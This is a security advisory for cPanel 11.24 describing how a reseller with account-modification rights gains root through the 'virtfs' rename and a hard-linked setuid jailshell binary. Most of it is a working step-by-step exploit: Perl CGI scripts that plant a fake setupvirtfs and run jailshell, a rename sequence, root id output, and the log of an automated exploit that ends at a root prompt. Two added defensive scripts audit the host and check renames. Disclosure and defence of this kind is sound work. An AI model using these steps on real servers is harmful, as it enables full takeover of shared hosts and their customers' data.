cPanel 11.24.7-BETA_35691 - owning virtfs



DESCRIPTION


Resellers with edit-account privileges can execute commands as root. What follows is a slightly edited version of the email cPanel was sent about this issue.


VERSIONS TESTED
11.24.7-BETA_35691
11.24.4-STABLE_35075
CentOS release 5.3 (Final)


REQUIREMENTS

A reseller account with the "Modify an Account" feature enabled.


PROBLEM

Resellers that have access to the "Modify an Account" feature in WHM can rename one of their accounts to the username "virtfs" (without the quotes). This will ultimately allow the reseller to obtain full, unrestricted root access to a box.


PREFACE

This vulnerability requires the reseller to control the "/home/virtfs" directory. Some hosts will have the /home/virtfs directory set up already, and some will not. The ones that do probably offer jailshell access, since executing /usr/local/cpanel/bin/jailshell is normally what creates the /home/virtfs directory, which is owned by root:root with mode 0700:

[root@host ~]# ls -ld /home/virtfs
drwx------  8 root     root     4096 Apr 29 22:53 /home/virtfs


Note that it does not matter if the directory exists or not in order to pull off this attack. If it doesn't exist, the reseller can create it. If it does exist, the reseller can destroy it and recreate it themselves.

This demonstration will assume that it already exists, for no other reason than the fact that I think it makes things a little more interesting/entertaining. Note that this demonstration also does not require logging into the shell at any time. We will be doing this entirely via the web browser in order to fully demonstrate the seriousness of this issue.
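Because the whole attack hinges on the state of /home/virtfs, the name "virtfs" in the account database, and extra directory entries pointing at the jailshell binary, a host audit can cover all three. The following script is an added example written for this advisory; it is not cPanel code and not part of the original report. It assumes a Linux host with GNU coreutils (stat -c) and GNU find (-samefile); the paths are parameters only so the checks can be exercised against a scratch directory.

```shell
#!/bin/sh
# Added example: audit the conditions the virtfs attack depends on.
# Not cPanel code. Assumes GNU stat/find; paths default to the real
# locations but can be overridden for testing.

# virtfs_dir_ok DIR [OWNER]
# Returns 0 when DIR is a real directory (not a symlink), owned by OWNER
# (default root) with mode 0700, which is the state jailshell creates.
virtfs_dir_ok() {
    dir=$1
    owner=${2:-root}
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        return 1
    fi
    set -- $(stat -c '%U %a' "$dir")
    [ "$1" = "$owner" ] && [ "$2" = "700" ]
}

# hardlink_count FILE: prints the number of hard links to FILE.
# The jailshell binary should have exactly one; a higher count means some
# other directory entry (for example under a user's home) shares its inode.
hardlink_count() {
    stat -c '%h' "$1"
}

# extra_links BINARY ROOT: lists entries under ROOT that share BINARY's
# inode, excluding BINARY itself. Empty output is the expected state.
extra_links() {
    find "$2" -xdev -samefile "$1" ! -path "$1" 2>/dev/null
}

# virtfs_account_exists [PASSWD_FILE]: returns 0 when a "virtfs" user is
# present (default /etc/passwd). No account should ever carry that name;
# it is reserved for the jailshell directory.
virtfs_account_exists() {
    grep -q '^virtfs:' "${1:-/etc/passwd}"
}

# audit_host: run every check against the live host and print findings.
# Returns 1 when anything looks wrong, 0 when the host is clean.
audit_host() {
    rc=0
    if [ -e /home/virtfs ] && ! virtfs_dir_ok /home/virtfs; then
        echo "FINDING: /home/virtfs is not a root-owned 0700 directory"
        rc=1
    fi
    if virtfs_account_exists; then
        echo "FINDING: a user named virtfs exists in /etc/passwd"
        rc=1
    fi
    js=/usr/local/cpanel/bin/jailshell
    if [ -f "$js" ] && [ "$(hardlink_count "$js")" -gt 1 ]; then
        echo "FINDING: $js has extra hard links:"
        extra_links "$js" /home
        rc=1
    fi
    return $rc
}

# Usage: sh audit-virtfs.sh audit
case "${1:-}" in
    audit) audit_host ;;
esac
```

Run it as root with the argument "audit"; any FINDING line means the host is either already in the state the advisory describes or has been left that way by an earlier rename. The hard-link check only works when /home and /usr/local/cpanel sit on the same filesystem, which is also the only situation in which the ln step of the attack can succeed.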


STEP 0 - set up /home/virtfs

If you're testing this yourself based on the instructions below, make sure you set up the /home/virtfs directory (log into an account via ssh that has jailshell access, or use a cgi script via your web browser to execute the jailshell binary, etc). Or, just use mkdir and chmod.


STEP 1 - create the reseller account

Create a reseller account (we'll use the username "reseller"), and allow it access to the "Modify an Account" feature in WHM.


STEP 2 - set up the reseller's cpanel3-skel/ dir


[ 1 of 3 ] Place the following script, called "user1.pl", in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
# Build a fake cPanel tree under user1's home and drop a "setupvirtfs" there
system("mkdir -p /home/user1/user2/usr/local/cpanel/bin");
system("echo '/usr/bin/id > /home/user1/id.out' > /home/user1/user2/usr/local/cpanel/bin/setupvirtfs");
chmod 0755, '/home/user1/user2/usr/local/cpanel/bin/setupvirtfs';


[ 2 of 3 ] Place the following script, called "user2.pl", in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
chdir '/home/user2';
# Hard-link the setuid jailshell binary into user2's home, then run it
system("ln /usr/local/cpanel/bin/jailshell");
system("/home/user2/jailshell /home/user2/jailshell.sh");


[ 3 of 3 ] Place the following script, called "jailshell.sh", in /home/reseller/cpanel3-skel/ and make sure it has permissions of 0755:

#!/bin/sh
/home/user2/jailshell


STEP 3 - create 2 new accounts

1. As the reseller "reseller", create 2 new user accounts called "user1" and "user2".

Verify that the following files exist:

+ /home/user1/public_html/cgi-bin/user1.pl
/home/user1/public_html/cgi-bin/user2.pl
/home/user1/jailshell.sh

/home/user2/public_html/cgi-bin/user1.pl
+ /home/user2/public_html/cgi-bin/user2.pl
+ /home/user2/jailshell.sh

NOTE: only the files on the lines starting with a "+" are going to actually be used.


STEP 4 - remove and recreate /home/virtfs

As the reseller "reseller",

A. use the "Modify an Account" option to rename "user1" to "virtfs".

B. use the "Modify an Account" option to rename "virtfs" to "user1".

* Now there is no more /home/virtfs :-)

C. terminate the "user1" account.

D. recreate the "user1" account.
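The rename sequence above works because nothing stops a reseller from moving an account onto a home directory it does not own. A pre-rename policy check is the control that addresses that root cause. The script below is an added illustration written for this advisory, not cPanel's account-modification code; the reserved-name list and the username syntax it enforces are assumptions, and the home root is a parameter only so the check can be exercised against a scratch tree. It assumes GNU stat and a POSIX id.

```shell
#!/bin/sh
# Added example: refuse account renames that would collide with reserved
# names or take over a home directory the account does not own.
# Not cPanel code; the reserved list and syntax rule are assumptions.

RESERVED_NAMES="virtfs root nobody cpanel"

# is_reserved NAME: returns 0 when NAME is on the reserved list.
is_reserved() {
    for n in $RESERVED_NAMES; do
        [ "$n" = "$1" ] && return 0
    done
    return 1
}

# rename_allowed OLD NEW [HOMEROOT]
# Prints a one-line verdict. Returns 0 when the rename may proceed and 1
# when it must be refused. HOMEROOT defaults to /home.
rename_allowed() {
    old=$1
    new=$2
    home=${3:-/home}

    # Assumed syntax policy: lowercase alphanumeric, 1-16 chars, leading letter.
    if ! printf '%s\n' "$new" | grep -Eq '^[a-z][a-z0-9]{0,15}$'; then
        echo "refused: bad username syntax '$new'"
        return 1
    fi

    if is_reserved "$new"; then
        echo "refused: '$new' is a reserved name"
        return 1
    fi

    # The target home must not already exist unless OLD's uid owns it.
    # Renaming onto a root-owned directory such as $home/virtfs is exactly
    # how the jailshell directory is captured in the steps above.
    if [ -e "$home/$new" ] || [ -L "$home/$new" ]; then
        old_uid=$(id -u "$old" 2>/dev/null) || old_uid=""
        dir_uid=$(stat -c '%u' "$home/$new")
        if [ -z "$old_uid" ] || [ "$old_uid" != "$dir_uid" ]; then
            echo "refused: $home/$new exists and is not owned by '$old'"
            return 1
        fi
    fi

    echo "ok: $old -> $new"
    return 0
}

# Usage: sh rename-check.sh OLD NEW
if [ $# -ge 2 ]; then
    rename_allowed "$1" "$2"
fi
```

The ownership test compares the numeric uid of the existing account with the uid owning the target directory, so a reseller cannot satisfy it by creating an account whose name happens to match a directory owned by root or by another customer.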


STEP 5 - execute user1.pl

Browse to the following URL:

http://x.x.x.x/~user1/cgi-bin/user1.pl


STEP 6 - rename user1 to virtfs

As the reseller "reseller", use the "Modify an Account" feature in WHM to rename the "user1" account to "virtfs".


STEP 7 - execute user2.pl

Browse to the following URL:

http://x.x.x.x/~user2/cgi-bin/user2.pl


* Now check the id.out file we created:

[user@host ~]$ cat /home/user1/id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



IMPACT


Full system compromise.


[user@host ~]$ ./11.24.4-EDGE_35784-virtfsown.pl
[+] Modify an Account (edit-account) privileges verified
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user1.pl
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user2.pl
[+] Creating /home/user/cpanel3-skel/user2.sh
[+] Creating /tmp/shell.c
[+] Compiling the shell and removing the source
[+] Creating /home/user/setupvirtfs.c
[+] Compiling /home/user/setupvirtfs.c
[+] Account user1 (qktiavbn.com) created
[+] Account user2 (wrkmhdpq.com) created
[?] /home/virtfs or /checkvirtfs exists. Safely removing /home/virtfs
[+] Renaming user1 to virtfs
[+] Renaming virtfs to user1
[?] /home/virtfs no longer exists
[+] Account user1 terminated
[+] Account user1 (zuamufgv.com) created
[+] URL 1: Creating the directory structure and setting up setupvirtfs
[+] Renaming user1 to virtfs
[+] URL 2: Calling the jailshell scripts
[root@host /]# id
uid=0(root) gid=0(root)